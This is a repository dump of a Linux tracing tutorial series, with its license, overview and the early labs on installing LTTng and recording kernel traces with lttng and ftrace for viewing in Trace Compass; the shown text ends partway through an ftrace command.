├── .gitignore ├── LICENSE ├── README.md ├── flamegraph.png └── labs ├── 001-what-is-tracing └── README.md ├── 002-install-lttng-on-ubuntu └── README.md ├── 003-record-kernel-trace-lttng └── README.md ├── 004-record-kernel-trace-ftrace └── README.md ├── 005-record-kernel-trace-perf └── README.md ├── 006-installing-tracecompass ├── README.md └── screenshots │ ├── addons.png │ ├── emptyWorkspace.png │ ├── genericCallStackAddons.png │ ├── importTraceDialog.png │ ├── importTraceMenu.png │ └── tutorialTracesImported.png ├── 101-analyze-system-trace-in-tracecompass ├── README.md └── screenshots │ ├── controlFlowView.png │ ├── fullTimeScale.png │ ├── histogramTimeRanges.png │ ├── importTraceDialog.png │ ├── importTraceMenu.png │ ├── kernelTraceJustOpened.png │ ├── projectExplorerExpanded.png │ ├── slowLs.png │ ├── timeGraphViewFilter.png │ ├── timeGraphViewLegend.png │ ├── timeGraphViewRemoveFilter.png │ ├── timeGraphViewSearch.png │ ├── traceCompassCpuUsage.png │ ├── traceCompassDiskActivity.png │ ├── traceCompassLatencyViews.png │ └── traceCompassStatisticsView.png ├── 102-tracing-wget-critical-path ├── README.md └── screenshots │ ├── compareCriticalPaths.png │ ├── criticalPathLegend.png │ ├── followProcess.png │ ├── followProcessZoom.png │ ├── kernelWaitAnalysisDjango.png │ ├── measureTimeDifference.png │ ├── newViewPinnedToSecond.png │ ├── pinToFirstTrace.png │ └── searchProcessTrace.png ├── 103-compare-package-managers ├── README.md └── screenshots │ ├── addBookmark.png │ ├── apt.png │ ├── importArchive.png │ ├── pacman.png │ ├── searchEventTableOpened.png │ ├── searchEventTableTree.png │ ├── yum.png │ └── zypper.png ├── 201-lttng-userspace-tracing ├── FlameChartsVsFlameGraphs.md ├── README.md ├── executables │ ├── ls │ └── wget └── screenshots │ ├── configureSymbols.png │ ├── configureSymbolsNameMapping.png │ ├── configureSymbolsRootDirectory.png │ ├── entryExitEvents.png │ ├── flameChart.png │ ├── flameGraph.png │ ├── functionDurationDistribution.png │ ├── functionDurationStatistics.png │ ├── incubatorFlameViews.png │ ├── openKernelUstExperiment.png │ ├── statedumpBinInfo.png │ ├── ustKernelConfigureSymbols.png │ ├── ustKernelCriticalPath.png │ ├── ustKernelFlameChart.png │ ├── ustKernelFlameGraph.png │ ├── ustKernelFollowThread.png │ ├── ustMemoryPotentialLeaks.png │ └── ustMemoryUsage.png ├── 202-bug-hunt ├── BugHuntResults.md ├── README.md ├── files │ ├── cat │ └── cat.c └── screenshots │ ├── importExperiment.png │ ├── memoryLeak.png │ ├── openExperiment.png │ ├── optimizationLoop.png │ ├── phoneHome.png │ └── spawnProcess.png ├── 203-custom-userspace-instrumentation-in-c ├── README.md ├── code │ ├── makefile │ ├── makefile.orig │ ├── ring.c │ ├── ring.orig.c │ ├── ring_tp.c │ └── ring_tp.h └── screenshots │ └── originalCode.png ├── 204-scripted-analysis-for-custom-instrumentation ├── README.md ├── screenshots │ ├── changeJavascriptEngine.png │ ├── customTraceOpened.png │ ├── enginesAndModules.png │ ├── installPlugIn.png │ ├── newFile.png │ ├── newFileName.png │ ├── runAsScript.png │ ├── scriptOutputConsole.png │ ├── scriptOutputEventsConsole.png │ ├── scriptedTimeGraph.png │ ├── scriptedTimeGraphArrows.png │ └── stateSystemExplorer.png └── scripts │ ├── step1_readTrace.js │ ├── step2_readEvents.js │ ├── step3_stateSystem.js │ ├── step4_timeLine.js │ └── step5_timeGraphArrow.js ├── 301-tracing-multiple-machines ├── README.md ├── screenshots │ ├── criticalPathWgetCold.png │ ├── criticalPathWgetHot.png │ ├── eventMatchingNoSync.png │ ├── eventMatchingSync.png │ ├── importExperiment.png │ ├── openAsExperiment.png │ ├── openExperiment.png │ ├── synchronizationResults.png │ └── synchronizeTraces.png └── scripts │ ├── payload │ ├── setupKernelTrace │ └── traceClientServer ├── 302-system-tracing-containers ├── README.md └── screenshots │ ├── installVMPlugin.png │ ├── selectContainer.png │ ├── virtualResourcesContainer.png │ ├── virtualResourcesContainerHighlighted.png │ ├── virtualResourcesZoomIn.png │ └── vmExperimentContainer.png ├── 303-jaeger-opentracing-traces ├── README.md └── screenshots │ ├── fetchWindow.png │ ├── fetchedTraces.png │ ├── installPlugIn.png │ ├── legend.png │ ├── perspective.png │ ├── rightClickMenu.png │ └── spanLifeView.png ├── 304-rocm-traces ├── README.md ├── screenshots │ └── openATrace.gif └── scripts │ ├── bt_plugin_rocm.py │ └── ctftrace.py ├── README.md └── TraceCompassTutorialTraces.tgz /.gitignore: -------------------------------------------------------------------------------- 1 | labs/203-custom-userspace-instrumentation-in-c/code/ring 2 | labs/203-custom-userspace-instrumentation-in-c/code/ring_tp.o 3 | labs/TraceCompassTutorialTraces/ 4 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Creative Commons Attribution 4.0 International Public License 2 | 3 | By exercising the Licensed Rights (defined below), You accept and agree to be 4 | bound by the terms and conditions of this Creative Commons Attribution 4.0 5 | International Public License ("Public License"). To the extent this Public 6 | License may be interpreted as a contract, You are granted the Licensed Rights in 7 | consideration of Your acceptance of these terms and conditions, and the Licensor 8 | grants You such rights in consideration of benefits the Licensor receives from 9 | making the Licensed Material available under these terms and conditions. 10 | 11 | Section 1 – Definitions. 12 | 13 | Adapted Material means material subject to Copyright and Similar Rights that 14 | is derived from or based upon the Licensed Material and in which the Licensed 15 | Material is translated, altered, arranged, transformed, or otherwise modified in 16 | a manner requiring permission under the Copyright and Similar Rights held by the 17 | Licensor. For purposes of this Public License, where the Licensed Material is a 18 | musical work, performance, or sound recording, Adapted Material is always 19 | produced where the Licensed Material is synched in timed relation with a moving 20 | image. Adapter's License means the license You apply to Your Copyright and 21 | Similar Rights in Your contributions to Adapted Material in accordance with the 22 | terms and conditions of this Public License. Copyright and Similar Rights means 23 | copyright and/or similar rights closely related to copyright including, without 24 | limitation, performance, broadcast, sound recording, and Sui Generis Database 25 | Rights, without regard to how the rights are labeled or categorized. For 26 | purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are 27 | not Copyright and Similar Rights. Effective Technological Measures means those 28 | measures that, in the absence of proper authority, may not be circumvented under 29 | laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty 30 | adopted on December 20, 1996, and/or similar international agreements. 31 | Exceptions and Limitations means fair use, fair dealing, and/or any other 32 | exception or limitation to Copyright and Similar Rights that applies to Your use 33 | of the Licensed Material. Licensed Material means the artistic or literary 34 | work, database, or other material to which the Licensor applied this Public 35 | License. Licensed Rights means the rights granted to You subject to the terms 36 | and conditions of this Public License, which are limited to all Copyright and 37 | Similar Rights that apply to Your use of the Licensed Material and that the 38 | Licensor has authority to license. Licensor means the individual(s) or 39 | entity(ies) granting rights under this Public License. Share means to provide 40 | material to the public by any means or process that requires permission under 41 | the Licensed Rights, such as reproduction, public display, public performance, 42 | distribution, dissemination, communication, or importation, and to make material 43 | available to the public including in ways that members of the public may access 44 | the material from a place and at a time individually chosen by them. Sui 45 | Generis Database Rights means rights other than copyright resulting from 46 | Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 47 | on the legal protection of databases, as amended and/or succeeded, as well as 48 | other essentially equivalent rights anywhere in the world. You means the 49 | individual or entity exercising the Licensed Rights under this Public License. 50 | Your has a corresponding meaning. 51 | 52 | Section 2 – Scope. 53 | 54 | License grant. Subject to the terms and conditions of this Public License, 55 | the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, 56 | non-exclusive, irrevocable license to exercise the Licensed Rights in the 57 | Licensed Material to: reproduce and Share the Licensed Material, in whole or in 58 | part; and produce, reproduce, and Share Adapted Material. Exceptions and 59 | Limitations. For the avoidance of doubt, where Exceptions and Limitations apply 60 | to Your use, this Public License does not apply, and You do not need to comply 61 | with its terms and conditions. Term. The term of this Public License is 62 | specified in Section 6(a). Media and formats; technical modifications allowed. 63 | The Licensor authorizes You to exercise the Licensed Rights in all media and 64 | formats whether now known or hereafter created, and to make technical 65 | modifications necessary to do so. The Licensor waives and/or agrees not to 66 | assert any right or authority to forbid You from making technical modifications 67 | necessary to exercise the Licensed Rights, including technical modifications 68 | necessary to circumvent Effective Technological Measures. For purposes of this 69 | Public License, simply making modifications authorized by this Section 2(a)(4) 70 | never produces Adapted Material. Downstream recipients. Offer from the 71 | Licensor – Licensed Material. Every recipient of the Licensed Material 72 | automatically receives an offer from the Licensor to exercise the Licensed 73 | Rights under the terms and conditions of this Public License. No downstream 74 | restrictions. You may not offer or impose any additional or different terms or 75 | conditions on, or apply any Effective Technological Measures to, the Licensed 76 | Material if doing so restricts exercise of the Licensed Rights by any recipient 77 | of the Licensed Material. No endorsement. Nothing in this Public License 78 | constitutes or may be construed as permission to assert or imply that You are, 79 | or that Your use of the Licensed Material is, connected with, or sponsored, 80 | endorsed, or granted official status by, the Licensor or others designated to 81 | receive attribution as provided in Section 3(a)(1)(A)(i). 82 | 83 | Other rights. Moral rights, such as the right of integrity, are not 84 | licensed under this Public License, nor are publicity, privacy, and/or other 85 | similar personality rights; however, to the extent possible, the Licensor waives 86 | and/or agrees not to assert any such rights held by the Licensor to the limited 87 | extent necessary to allow You to exercise the Licensed Rights, but not 88 | otherwise. Patent and trademark rights are not licensed under this Public 89 | License. To the extent possible, the Licensor waives any right to collect 90 | royalties from You for the exercise of the Licensed Rights, whether directly or 91 | through a collecting society under any voluntary or waivable statutory or 92 | compulsory licensing scheme. In all other cases the Licensor expressly reserves 93 | any right to collect such royalties. 94 | 95 | Section 3 – License Conditions. 96 | 97 | Your exercise of the Licensed Rights is expressly made subject to the following 98 | conditions. 99 | 100 | Attribution. 101 | 102 | If You Share the Licensed Material (including in modified form), You 103 | must: retain the following if it is supplied by the Licensor with the Licensed 104 | Material: identification of the creator(s) of the Licensed Material and any 105 | others designated to receive attribution, in any reasonable manner requested by 106 | the Licensor (including by pseudonym if designated); a copyright notice; a 107 | notice that refers to this Public License; a notice that refers to the 108 | disclaimer of warranties; a URI or hyperlink to the Licensed Material to the 109 | extent reasonably practicable; indicate if You modified the Licensed Material 110 | and retain an indication of any previous modifications; and indicate the 111 | Licensed Material is licensed under this Public License, and include the text 112 | of, or the URI or hyperlink to, this Public License. You may satisfy the 113 | conditions in Section 3(a)(1) in any reasonable manner based on the medium, 114 | means, and context in which You Share the Licensed Material. For example, it may 115 | be reasonable to satisfy the conditions by providing a URI or hyperlink to a 116 | resource that includes the required information. If requested by the Licensor, 117 | You must remove any of the information required by Section 3(a)(1)(A) to the 118 | extent reasonably practicable. If You Share Adapted Material You produce, the 119 | Adapter's License You apply must not prevent recipients of the Adapted Material 120 | from complying with this Public License. 121 | 122 | Section 4 – Sui Generis Database Rights. 123 | 124 | Where the Licensed Rights include Sui Generis Database Rights that apply to Your 125 | use of the Licensed Material: 126 | 127 | for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, 128 | reuse, reproduce, and Share all or a substantial portion of the contents of the 129 | database; if You include all or a substantial portion of the database contents 130 | in a database in which You have Sui Generis Database Rights, then the database 131 | in which You have Sui Generis Database Rights (but not its individual contents) 132 | is Adapted Material; and You must comply with the conditions in Section 3(a) if 133 | You Share all or a substantial portion of the contents of the database. 134 | 135 | For the avoidance of doubt, this Section 4 supplements and does not replace Your 136 | obligations under this Public License where the Licensed Rights include other 137 | Copyright and Similar Rights. 138 | 139 | Section 5 – Disclaimer of Warranties and Limitation of Liability. 140 | 141 | Unless otherwise separately undertaken by the Licensor, to the extent 142 | possible, the Licensor offers the Licensed Material as-is and as-available, and 143 | makes no representations or warranties of any kind concerning the Licensed 144 | Material, whether express, implied, statutory, or other. This includes, without 145 | limitation, warranties of title, merchantability, fitness for a particular 146 | purpose, non-infringement, absence of latent or other defects, accuracy, or the 147 | presence or absence of errors, whether or not known or discoverable. Where 148 | disclaimers of warranties are not allowed in full or in part, this disclaimer 149 | may not apply to You. To the extent possible, in no event will the Licensor be 150 | liable to You on any legal theory (including, without limitation, negligence) or 151 | otherwise for any direct, special, indirect, incidental, consequential, 152 | punitive, exemplary, or other losses, costs, expenses, or damages arising out of 153 | this Public License or use of the Licensed Material, even if the Licensor has 154 | been advised of the possibility of such losses, costs, expenses, or damages. 155 | Where a limitation of liability is not allowed in full or in part, this 156 | limitation may not apply to You. 157 | 158 | The disclaimer of warranties and limitation of liability provided above 159 | shall be interpreted in a manner that, to the extent possible, most closely 160 | approximates an absolute disclaimer and waiver of all liability. 161 | 162 | Section 6 – Term and Termination. 163 | 164 | This Public License applies for the term of the Copyright and Similar Rights 165 | licensed here. However, if You fail to comply with this Public License, then 166 | Your rights under this Public License terminate automatically. 167 | 168 | Where Your right to use the Licensed Material has terminated under Section 169 | 6(a), it reinstates: automatically as of the date the violation is cured, 170 | provided it is cured within 30 days of Your discovery of the violation; or upon 171 | express reinstatement by the Licensor. For the avoidance of doubt, this Section 172 | 6(b) does not affect any right the Licensor may have to seek remedies for Your 173 | violations of this Public License. For the avoidance of doubt, the Licensor may 174 | also offer the Licensed Material under separate terms or conditions or stop 175 | distributing the Licensed Material at any time; however, doing so will not 176 | terminate this Public License. Sections 1, 5, 6, 7, and 8 survive termination 177 | of this Public License. 178 | 179 | Section 7 – Other Terms and Conditions. 180 | 181 | The Licensor shall not be bound by any additional or different terms or 182 | conditions communicated by You unless expressly agreed. Any arrangements, 183 | understandings, or agreements regarding the Licensed Material not stated herein 184 | are separate from and independent of the terms and conditions of this Public 185 | License. 186 | 187 | Section 8 – Interpretation. 188 | 189 | For the avoidance of doubt, this Public License does not, and shall not be 190 | interpreted to, reduce, limit, restrict, or impose conditions on any use of the 191 | Licensed Material that could lawfully be made without permission under this 192 | Public License. To the extent possible, if any provision of this Public License 193 | is deemed unenforceable, it shall be automatically reformed to the minimum 194 | extent necessary to make it enforceable. If the provision cannot be reformed, it 195 | shall be severed from this Public License without affecting the enforceability 196 | of the remaining terms and conditions. No term or condition of this Public 197 | License will be waived and no failure to comply consented to unless expressly 198 | agreed to by the Licensor. Nothing in this Public License constitutes or may be 199 | interpreted as a limitation upon, or waiver of, any privileges and immunities 200 | that apply to the Licensor or You, including from the legal processes of any 201 | jurisdiction or authority. 202 | 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Trace Visualization Labs 2 | 3 | ![flamegraph](flamegraph.png) 4 | 5 | This repository contains a series of labs and guides for collecting traces from the operating system or userspace applications or cloud environments, and visualizing them with trace visualization tools. While most of the labs will use [LTTng](http://lttng.org) for trace collection and [Trace Compass](http://tracecompass.org/) for visualization, some labs may use other tools. 6 | 7 | Each lab has specific goals and objectives. The main text is present in the README of each lab's directory and contains various tasks outlined chronologically, to achieve the goal and complete the lab. The text also contains suggestions for navigation of the tasks. There will also be screenshots for each lab to help you guide through the UI and visualizations. Sample traces for all the labs are saved in a compressed file named [TraceCompassTutorialTraces.tgz](https://github.com/tuxology/tracevizlab/blob/master/labs/TraceCompassTutorialTraces.tgz) which can allow the user to skip reproducing the experiment and generating traces. 8 | 9 | This lab can be reproduced, with a hands-on approach, with the tracing and visualization tools at hand. Or it can simply be read, in which case some sections of the labs, describing shorcuts and navigation options, may be skipped. Those sections are contained between :small_red_triangle_down: and :small_red_triangle: signs. 10 | 11 | ### Goals 12 | 13 | - Understand what tracing is and when it can be of help in diagnosing performance issues 14 | - Identify tracing tools and understand techniques that are used to generate traces 15 | - Selecting and using correct set of trace visualizations to quickly identify performance issues 16 | - Understand application/OS behavior and its internals using tracing 17 | 18 | ### Prerequisites 19 | 20 | - A Linux system or a Linux virtual machine 21 | - Basic understanding of Operating Systems fundamentals 22 | - Some experience in debugging applications and systems 23 | 24 | ## Lab developers 25 | - [Matthew Khouzam](https://twitter.com/DavisTurlis) 26 | - [Geneviève Bastien](https://twitter.com/genbastien) 27 | - [Mohamad Gebai](https://twitter.com/mogeb88) 28 | - [Suchakra Sharma](https://twitter.com/tuxology) 29 | - Arnaud Fiorini 30 | - Katherine Nadeau 31 | -------------------------------------------------------------------------------- /flamegraph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/flamegraph.png -------------------------------------------------------------------------------- /labs/001-what-is-tracing/README.md: -------------------------------------------------------------------------------- 1 | ## What/When/Why Tracing 2 | 3 | Before going further in this tutorial and starting with the labs, let's define tracing: what it is, when to use it and how it compares with other tools. 4 | 5 | - - - 6 | 7 | ### What Is Tracing? 8 | 9 | `Tracing` consists in recording specific information during a program's or operating system's execution to better understand what is happening on the system. The simplest form of tracing is what we all learn in programming 101: printf! 10 | 11 | Every location in the code that we want to trace is called a `tracepoint` and every time a tracepoint is hit is called an `event`. Putting tracepoints in the code is called `instrumentation`. The following example shows those concepts 12 | 13 | ``` 14 | int my_func(void* my_value) { 15 | int i, ret; 16 | 17 | printf("Entering my function") // <-- tracepoint 18 | for (i = 0; i < MAX; i++) { 19 | ret = do_something_with(my_value, i); 20 | printf("In for loop %d", i); // <-- tracepoint 21 | } 22 | printf("Done: %d", ret); // <-- tracepoint 23 | 24 | return ret; 25 | } 26 | ``` 27 | 28 | ``` 29 | $ ./myprog 30 | Entering my function // <-- event 31 | In for loop 0 // <-- event 32 | In for loop 1 // <-- event 33 | In for loop 2 // <-- event 34 | Done: 10 // <-- event 35 | ``` 36 | 37 | But printf is usually used for quick instantaneous debugging of an application and is removed from production code (right?) 38 | 39 | Logging is another form of tracing. It usually associates a timestamp with events to better understand the timing in the application. But we usually log only high level information, as disk space is a limited resource (right?) 40 | 41 | The `tracing` we're discussing here is high speed, low overhead tracing. With such tracing, the tracepoints can be present in the code at all time (linux has tons of tracepoints in its code, ready to be hooked to), they have a near-zero overhead when not tracing and a very low one one with a tracer enabled. Tracers can handle hundreds of thousands events/second. Some tracers, like ftrace, lttng and perf store the events on disk for later processing, others, like ebpf, handle them on the fly in callbacks that can aggregate data to gather statistics or can immediatly react to any anomaly. 42 | 43 | - - - 44 | 45 | ### When To Trace? 46 | 47 | Tracing is just another tool in the developer or sysadmin's toolbox. It is most often not the first one to use. But in some situations, in can be very useful, regardless of if the application to trace is instrumented or not (see next section). 48 | 49 | Tracing is best used to understand very complex systems, or even simple ones, but the real added value comes when trying to understand complexity and all else fails. 50 | 51 | First, let's see what else is in the toolbox and when to best use each of those tools. 52 | 53 | * If you want to know what could/should be optimized in your application, where it spends more time, etc, then `profiling` or `sampling` is the best tool for the job. It will aggregate data of the different calls and show statistical results. The longer you profile, the more accurate the results will be. Some profilers also provide an `instrumented` mode, which is really close to tracing. By default, it aggregates the data like sampled profiling, only more accurately, but if it's possible to store the events, it could make a good userspace trace. 54 | 55 | * If you want to debug your very complex algorithm, then a good `debugger` is the best approach, or even printfs! 56 | 57 | * If you want to know what happened at 8h06PM on your server farm when there was that big DDOS attack, then `log` files are the best first goto. The answer is probably there. 58 | 59 | * If you want to get performance metrics on your system through time, then `monitoring` is mandatory. Some highly detailed monitoring tools use `instrumentation`, the same as for tracing, to compute some metrics. But monitoring is mostly aggregation of data to throw alerts and show in nice graphs and dashboards. 60 | 61 | When these tools fails though, `tracing` is there: 62 | 63 | * When `profiling` will miss that call at around 17min in the execution where there was a huge latency, it will either go unnoticed, or be lost as a statistic, without context or detail. `Tracing` can detect that latency and you can then zoom in on it and see everything that happened around that time and led to that moment. 64 | 65 | * When `debugging` your algorithm, or even printing the details, the bug never happens. The added latency of those techniques makes that race condition impossible to catch! Or that unit test that fails one in a 100 times. Or that service that timeouts whenever you start debugging. `Tracing`'s overhead is rarely high enough to remove the potential race condition or have the system time out, so if running with tracing enabled, when the problem happens, the trace may show what happened on the system at the time, or you may need to enable more events, but it will eventually show something. 66 | 67 | * When `log` files have put you on a trail, but looking at everything, you just can't put your finger on it. `Tracing` will show everything (well, almost) that is hidden from log data and you can have an overview of the whole system at a given time. 68 | 69 | * When `monitoring` shows a problematic period and querying the `logs` at that time shows the guilty component (or not), `tracing` will allow to drill down into that component or system at that time to help pinpoint the problem more accurately. 70 | 71 | - - - 72 | 73 | ### What To Trace? Application Vs System Vs Distributed Tracing 74 | 75 | So, what do we trace? Typically, applications have log statements in various locations, associated with a log level. Statements with high verbosity can be considered tracing statements. Log verbosity can be modified, either at system start or at runtime. Sometimes, various log handlers can be hooked to the application, per verbosity level. While file handlers are very current, other type of logging can be done. Sometimes, it can be defined at compile-time, `qemu` for instance, can compile some statements with various backends: `systemtap`, `LTTng UST`, `simple` or `stderr`. 76 | 77 | This is what we call `application tracing` as it gives information on the internal state of the application: what happens in user land. 78 | 79 | Sounds easy and wonderful, but how many applications have tracepoints? Not that many, though more and more, but that doesn't matter [too much]. 80 | 81 | Because there is also `system tracing`. Operating systems and drivers themselves have [a lot!] of tracepoints in their code, and that alone, gives a lot of information about an application, and mostly, about the system on which it's executing. So even without any user space data, a trace of the OS can be enough to identify many typical application problems. 82 | 83 | `Application tracing` and `system tracing` together are very powerful. The former will allow to seize the problem, find it in time, and get the application context, like the picture of a group in front of the green screen. The latter will put this picture in its environment, ie draw the background of that group picture. 84 | 85 | In this tutorial, we will focus only on linux, but Windows also has its tracing framework, called [ETW](https://docs.microsoft.com/en-us/windows/desktop/etw/about-event-tracing). 86 | 87 | Nowadays, applications are developed as micro-services running in containers that can be run on various machines, either physical or virtual. Micro-services communicate together through some message passing libraries or home-made communication. `Distributed tracing` allows to follow requests through the systems. APIs like [`OpenTracing API`](https://opentracing.io/) provide a means to instrument the various components of the system and many common communication libraries are already instrumented. They only require a tracer to enable collecting data. 88 | 89 | - - - 90 | 91 | ### How To Trace? 92 | 93 | The rest of this tutorial will answer that question and more! 94 | 95 | - - - 96 | 97 | #### Next 98 | 99 | * [Install LTTng on Ubuntu](../002-install-lttng-on-ubuntu) to install `LTTng` as a tracing tools (for application and systems) and record traces 100 | or 101 | * [Record System Trace With LTTng](../003-record-kernel-trace-lttng) to record system traces with `lttng`, if it is already installed. 102 | or 103 | * [Record System Trace With Ftrace](../004-record-kernel-trace-ftrace) to record system traces with `ftrace` 104 | or 105 | * [Record System Trace With Perf](../005-record-kernel-trace-perf) to record system traces with `perf` 106 | or 107 | * [Installing Trace Compass](../006-installing-tracecompass) to install the visualization tool and use the traces provided with the tutorial 108 | or 109 | * [Back](../) for more options 110 | -------------------------------------------------------------------------------- /labs/002-install-lttng-on-ubuntu/README.md: -------------------------------------------------------------------------------- 1 | ## Installing LTTng on Ubuntu 2 | 3 | In this lab, you will install lttng on an Ubuntu machine 4 | 5 | *Pre-requisites*: Have root access to an ubuntu LTS machine 6 | 7 | - - - 8 | 9 | ### Task 1: Install lttng for kernel tracing 10 | 11 | First install the lttng PPA repository: 12 | 13 | ``` 14 | $ sudo apt-add-repository ppa:lttng/stable-2.10 15 | ``` 16 | 17 | This should automatically fetch the updates for all repos. If not, you may need to manually update your repositories 18 | 19 | ``` 20 | $ sudo apt-get update 21 | ``` 22 | 23 | For kernel tracing only, the **lttng-modules-dkms** and **lttng-tools** packages need to be installed: 24 | 25 | ``` 26 | $ sudo apt-get install lttng-tools lttng-modules-dkms 27 | ``` 28 | 29 | The package installation will have created a group called **tracing**. This group allows its members to be able to run lttng commands without requiring to be *sudo* and, in consequence, to save traces that are directly readable by the user instead of saving them as root. The installation does not add the user to the **tracing** group, so you may do it at this point. 30 | 31 | ``` 32 | $ sudo usermod -a -G tracing 33 | ``` 34 | Make sure to log off and log in the user to apply the groups modification. You can also start a shell logged in the tracing group using: 35 | 36 | ``` 37 | newgrp tracing 38 | ``` 39 | 40 | You are now ready to get a kernel trace. You may proceed to the [Record a kernel trace](../003-record-kernel-trace-lttng) lab or install additional packages to get more tracing options. Most of them will be covered in later labs, so it is advised to install them now. 41 | 42 | - - - 43 | 44 | ### Task 2: Install LTTng's additional packages for different purposes 45 | 46 | To trace userspace applications with some builtin features, for example function entry and exit, application memory allocations and other calls to the libc library: 47 | 48 | ``` 49 | $ sudo apt-get install liblttng-ust0 50 | ``` 51 | 52 | To add userspace tracepoints to your own application: 53 | 54 | ``` 55 | $ sudo apt-get install liblttng-ust-dev 56 | ``` 57 | 58 | To trace Java applications instrumented with either JUL or Log4j: 59 | 60 | ``` 61 | $ sudo apt-get install liblttng-ust-agent-java 62 | ``` 63 | 64 | To instrument and trace python3 applications: 65 | 66 | ``` 67 | $ sudo apt-get install python3-lttngust 68 | ``` 69 | 70 | - - - 71 | 72 | ### References 73 | 74 | * [LTTng website](http://lttng.org) 75 | * [Installation instructions for Ubuntu](https://lttng.org/docs/v2.10/#doc-ubuntu) 76 | * [Instructions for other distributions](https://lttng.org/download/) 77 | 78 | - - - 79 | 80 | #### Next 81 | 82 | * [Record kernel trace with LTTng](../003-record-kernel-trace-lttng) to record a kernel trace 83 | or 84 | * [Back](../) for more options 85 | -------------------------------------------------------------------------------- /labs/003-record-kernel-trace-lttng/README.md: -------------------------------------------------------------------------------- 1 | ## Record a Kernel Trace With LTTng 2 | 3 | In this lab, you will obtain a kernel trace that can then be analyzed by various visualization tools. 4 | 5 | *Pre-requisite*: Have lttng installed. You can follow the [Installing LTTng on Ubuntu](../002-install-lttng-on-ubuntu/) lab, read the [LTTng Download page](https://lttng.org/download/) for installation instructions for other distributions or use a Virtual Machine with LTTng pre-installed, provided by the instructor. 6 | 7 | - - - 8 | 9 | ### Task 1: Tracing session daemon 10 | 11 | In order to trace with lttng, one first needs to have the tracing session daemon running as root. If you installed from packages, it should already be running. You can verify by running 12 | 13 | ``` 14 | $ systemctl status lttng-sessiond 15 | ``` 16 | 17 | If the service is available but not running, you can start it with 18 | 19 | ``` 20 | $ sudo systemctl start lttng-sessiond 21 | ``` 22 | 23 | If you installed from source or the service is not available on your distro, you can start the session daemon manually 24 | 25 | ``` 26 | $ sudo lttng-sessiond -d 27 | ``` 28 | 29 | - - - 30 | 31 | ### Task 2: Get a kernel trace 32 | 33 | First, you need to create a tracing session. This session can be configured with various events. 34 | 35 | ``` 36 | $ lttng create 37 | Session auto-20180723-180856 created. 38 | Traces will be written in /home/virtual/lttng-traces/auto-20180723-180856 39 | ``` 40 | 41 | The output of the command will indicate where the trace will be saved. 42 | 43 | The following commands will enable the events necessary to take advantage of a maximum of analyses in Trace Compass, without generating a trace too large. 44 | 45 | ``` 46 | $ lttng enable-event -k sched_switch,sched_waking,sched_pi_setprio,sched_process_fork,sched_process_exit,sched_process_free,sched_wakeup,\ 47 | irq_softirq_entry,irq_softirq_raise,irq_softirq_exit,irq_handler_entry,irq_handler_exit,\ 48 | lttng_statedump_process_state,lttng_statedump_start,lttng_statedump_end,lttng_statedump_network_interface,lttng_statedump_block_device,\ 49 | block_rq_complete,block_rq_insert,block_rq_issue,\ 50 | block_bio_frontmerge,sched_migrate,sched_migrate_task,power_cpu_frequency,\ 51 | net_dev_queue,netif_receive_skb,net_if_receive_skb,\ 52 | timer_hrtimer_start,timer_hrtimer_cancel,timer_hrtimer_expire_entry,timer_hrtimer_expire_exit 53 | $ lttng enable-event -k --syscall --all 54 | ``` 55 | 56 | Next, you can start the tracing session 57 | 58 | ``` 59 | $ lttng start 60 | ``` 61 | 62 | Execute the payload to trace, here a simple ```ls``` command 63 | 64 | ``` 65 | $ wget https://lttng.org 66 | ``` 67 | 68 | Then stop and destroy the tracing session. 69 | 70 | ``` 71 | $ lttng destroy 72 | ``` 73 | 74 | - - - 75 | 76 | ### Task 3: Use a utility script to trace 77 | 78 | The [lttng-utils](https://github.com/tahini/lttng-utils) script can be used to trace instead of the commands of the previous task. First, get and install the script 79 | 80 | ``` 81 | $ sudo pip3 install --upgrade git+git://github.com/tahini/lttng-utils.git@master 82 | ``` 83 | 84 | See the README for more install options. Once installed, you can just run the trace record script with the command to run. For instance, to reproduce the same result as the previous task, simply do 85 | 86 | ``` 87 | $ lttng-record-trace wget https://lttng.org 88 | ``` 89 | 90 | The trace will be saved in the current directory, unless you specify an ``--output`` path to the command line 91 | 92 | - - - 93 | 94 | ### Task 4: Retrieve the trace 95 | 96 | If the trace was not taken on the machine on which trace visualization will happen (for example, in a VM provided by the instructors), then the trace needs to be brought on the trace viewing machine. An LTTng trace consists in a directory with a metadata files, one tracing file and one index file for each CPU traced. To retrieve this, rsync is the best command 97 | 98 | ``` 99 | $ rsync -avz @: traces/ 100 | ``` 101 | 102 | - - - 103 | 104 | ### References 105 | 106 | * [LTTng user documentation](http://lttng.org/docs) 107 | * [lttng-utils](https://github.com/tahini/lttng-utils) tracing helper documentation 108 | 109 | - - - 110 | 111 | #### Next 112 | 113 | * [Record kernel trace with ftrace](../004-record-kernel-trace-ftrace) to record a kernel trace with ftrace 114 | or 115 | * [Installing Trace Compass](../006-installing-tracecompass) to install the visualization tool 116 | or 117 | * [Back](../) for more options 118 | -------------------------------------------------------------------------------- /labs/004-record-kernel-trace-ftrace/README.md: -------------------------------------------------------------------------------- 1 | ## Record a Kernel Trace With Ftrace 2 | 3 | While this tutorial will mainly use LTTng for tracing, as it can provide both kernel and userspace traces, synchronized on the same time reference, it is also possible to get the same results for kernel tracing using `ftrace`. Ftrace has the advantage that it is builtin the linux kernel and many people are used to it. In this lab, you will obtain a kernel trace that can then be analyzed by the visualization tools, using ftrace and trace-cmd. 4 | 5 | - - - 6 | 7 | ### Task 1: Install trace-cmd 8 | 9 | `trace-cmd` is a helper application for ftrace that does not require to directly set values in debugfs in order to trace. It is available as a package in most linux distributions, so to install, just ask your preferred package manager, for instance 10 | 11 | ``` 12 | sudo apt-get install trace-cmd 13 | ``` 14 | 15 | - - - 16 | 17 | ### Task 2: Record a trace with trace-cmd 18 | 19 | The following commands will enable the events necessary to take advantage of a maximum of analyses in Trace Compass, without generating a trace too large. It is the equivalent of the trace generated in the lttng tutorial. 20 | 21 | ``` 22 | $ sudo trace-cmd record -e sched_switch -e sched_waking -e sched_pi_setprio -e sched_process_fork \ 23 | -e sched_process_exit -e sched_process_free -e 